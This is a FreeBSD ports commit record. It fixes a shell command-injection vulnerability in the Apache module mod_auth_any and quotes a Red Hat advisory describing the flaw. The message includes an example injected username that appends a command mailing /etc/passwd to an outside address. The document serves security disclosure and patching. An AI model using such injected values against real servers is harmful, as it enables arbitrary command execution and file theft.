diff options
| author | Mario Sergio Fujikawa Ferreira <lioux@FreeBSD.org> | 2003-03-25 12:23:11 +0800 |
|---|---|---|
| committer | Mario Sergio Fujikawa Ferreira <lioux@FreeBSD.org> | 2003-03-25 12:23:11 +0800 |
| commit | 0025bdf0b2935e18a51f4a900650754c207175a5 (patch) | |
| tree | 7843767d8e7a5f47abe9adc65b6afa236e27f1d4 /chinese/libtabe | |
| parent | 7a568562a206c6673ba949eb6af0f4d06217ec9f (diff) | |
| download | freebsd-ports-gnome-0025bdf0b2935e18a51f4a900650754c207175a5.tar.gz freebsd-ports-gnome-0025bdf0b2935e18a51f4a900650754c207175a5.tar.zst freebsd-ports-gnome-0025bdf0b2935e18a51f4a900650754c207175a5.zip | |
o Fix vulnerability that allows execution of arbitrary commands on
the server with the uid of the apache process. Background [1]:
"The module accepts a username and password from the web client,
passes them to a user-space executable (using popen(3), which invokes
a shell) and waits for a response in order to authenticate the user.
The password is quoted on the popen() command line to avoid
interpretation of shell special chars, but the username is not.
Thus a malicious user can execute commands by supplying an appropriately
crafted username. (e.g. "foo&mail me@my.home</etc/passwd")
"The problem is easily fixed by adding quotes (and escaping any
quotes already present) to the username and password in the popen
command line."
o Fix this by adding a escaping function from [2]. Then, modifying
this function appropriately with ideas from [3]. Apply the new
escaping code to mod_auth_any.
o Bump PORTREVISION
Submitted by: Security Officer (nectar),
Red Hat Security Response Team <security@redhat.com> [1]
Obtained from: mod_auth_any CVS [2],
nalin@redhat.com [3]
Diffstat (limited to 'chinese/libtabe')
0 files changed, 0 insertions, 0 deletions